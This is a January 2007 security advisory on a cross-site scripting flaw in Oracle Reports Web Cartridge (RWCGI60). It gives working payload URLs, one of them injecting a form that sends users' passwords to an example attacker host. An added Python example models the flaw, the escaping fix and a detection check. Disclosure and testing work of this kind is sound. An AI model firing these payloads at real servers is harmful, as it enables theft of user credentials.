
[ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS



=============================================
INTERNET SECURITY AUDITORS ALERT 2007-001
- Original release date: January 17, 2007
- Last revised: January 17, 2007
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.

II. BACKGROUND
-------------------------
The Reports Web CGI or Web Cartridge is required for the Reports
Server when using the Oracle Application Server (OAS) to process
report requests from Web clients.

III. DESCRIPTION
-------------------------
Improper validation of the "genuser" parameter allows an attacker to
inject arbitrary script/HTML code that is executed in the client's
browser.

This is especially serious because the affected page is an
authentication form: a malicious user can capture the authentication
credentials of other users.

IV. PROOF OF CONCEPT
-------------------------
Original URL:
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>

This request returns a page with an authentication form (User Name,
Password, and Database fields).

When the form is submitted with the POST method (rwcgi60 accepts both
GET and POST), the browser sends:
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>

A malicious user can modify the value of the "genuser" parameter and
inject arbitrary script/HTML code. Both examples below start the
payload with "User Name" so that the visible label of the form is
unchanged:

--- Example 1 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User Name<script>alert('Vulnerable to XSS attack!');</script>

--- Example 2 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form name='AttackerForm' action='http://attacker-machine.com/credentials'>User Name

In Example 2 the injected "</form>" closes the legitimate form early;
the fields that follow, including the password field, now belong to
"AttackerForm" and are submitted to the attacker's server.
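The mechanism behind Examples 1 and 2, as an added example that is not code from Internet Security Auditors or Oracle. The advisory does not reproduce rwcgi60's real markup, so the page skeleton in LOGIN_FORM is an assumption with only the properties the advisory relies on: one POST form containing the password field, with the "genuser" text placed before it. The block shows the unescaped reflection, the escaped rendering a fix needs, and a check a tester can run over a captured response to see which form the password field actually submits to.

```python
"""
Added example, not code from Internet Security Auditors or Oracle.

Models the flaw described above: the value of "genuser" is written into the
login page's "User Name" label without escaping.  LOGIN_FORM is an assumed
skeleton (the advisory does not reproduce rwcgi60's real template).
"""
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Assumed page skeleton returned by "rwcgi60?showmap"; the real markup differs.
LOGIN_FORM = (
    "<form name='LoginForm' method='POST' action='/dev60cgi/rwcgi60'>"
    "{label}: <input name='username'> "
    "Password: <input type='password' name='password'> "
    "Database: <input name='database'> "
    "<input type='hidden' name='authtype' value='D'>"
    "<input type='submit' value='Submit'>"
    "</form>"
)

# Payloads taken from the advisory's Example 1 and Example 2.
PAYLOAD_SCRIPT = "User Name<script>alert('Vulnerable to XSS attack!');</script>"
PAYLOAD_FORM = ("</form><form name='AttackerForm' "
                "action='http://attacker-machine.com/credentials'>User Name")


def showmap_query(server, genuser):
    """Build the query string of the advisory's URL with a chosen genuser."""
    # "showmap" is a bare flag in the advisory's URL, so it is prepended as-is.
    return "showmap&" + urlencode({"server": server, "genuser": genuser})


def _genuser_from(query):
    params = parse_qs(query, keep_blank_values=True)
    return params.get("genuser", ["User Name"])[0]


def render_vulnerable(query):
    """Vulnerable rendering: genuser is copied verbatim into the page."""
    return LOGIN_FORM.format(label=_genuser_from(query))


def render_fixed(query):
    """Hardened rendering: genuser is HTML-escaped (quotes included) first."""
    return LOGIN_FORM.format(label=html.escape(_genuser_from(query), quote=True))


FORM_RE = re.compile(r"<form([^>]*)>(.*?)</form>", re.I | re.S)
ACTION_RE = re.compile(r"\baction\s*=\s*['\"]([^'\"]*)['\"]", re.I)


def password_form_action(body):
    """Action URL of the form that actually contains the password field.

    This is the check that matters for Example 2: after "</form><form ...>"
    the password input belongs to the attacker's form, not to LoginForm.
    """
    for attrs, inner in FORM_RE.findall(body):
        if re.search(r"name=['\"]password['\"]", inner, re.I):
            match = ACTION_RE.search(attrs)
            return match.group(1) if match else ""
    return None


def foreign_form_actions(body, trusted_host):
    """Form actions in a captured response that submit to another host."""
    found = []
    for attrs, _ in FORM_RE.findall(body):
        match = ACTION_RE.search(attrs)
        if not match:
            continue
        host = urlparse(match.group(1)).hostname
        if host and host.lower() != trusted_host.lower():
            found.append(match.group(1))
    return found


if __name__ == "__main__":
    query = showmap_query("<oracle-reports-server>", PAYLOAD_FORM)
    print("vulnerable:", password_form_action(render_vulnerable(query)))
    print("fixed:     ", password_form_action(render_fixed(query)))
```

To use the check against a real target, request the showmap URL with the Example 2 payload, save the response body, and pass it to password_form_action() and foreign_form_actions() with the server's host name; a patched server returns the local action for the password form and an empty list of foreign actions.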

V. BUSINESS IMPACT
-------------------------
An attacker can hijack the sessions of other authenticated users,
obtain their authentication credentials, or deface the authentication
form page.

VI. SYSTEMS AFFECTED
-------------------------
Oracle9i Application Server Release 2, version 9.0.2.3

VII. SOLUTION
-------------------------
The January 2007 CPU (Critical Patch Update) contains fixes for this
vulnerability.

VIII. REFERENCES
-------------------------
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
January   17, 2007:  Initial release

XI. DISCLOSURE TIMELINE
-------------------------
April     23, 2006: Vulnerability acquired by
                    Internet Security Auditors
April     24, 2006: Initial vendor notification sent.
April     29, 2006: Initial response of the vendor
January   16, 2007: The vendor fixed the vulnerability in the CPU.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
use or misuse of this information.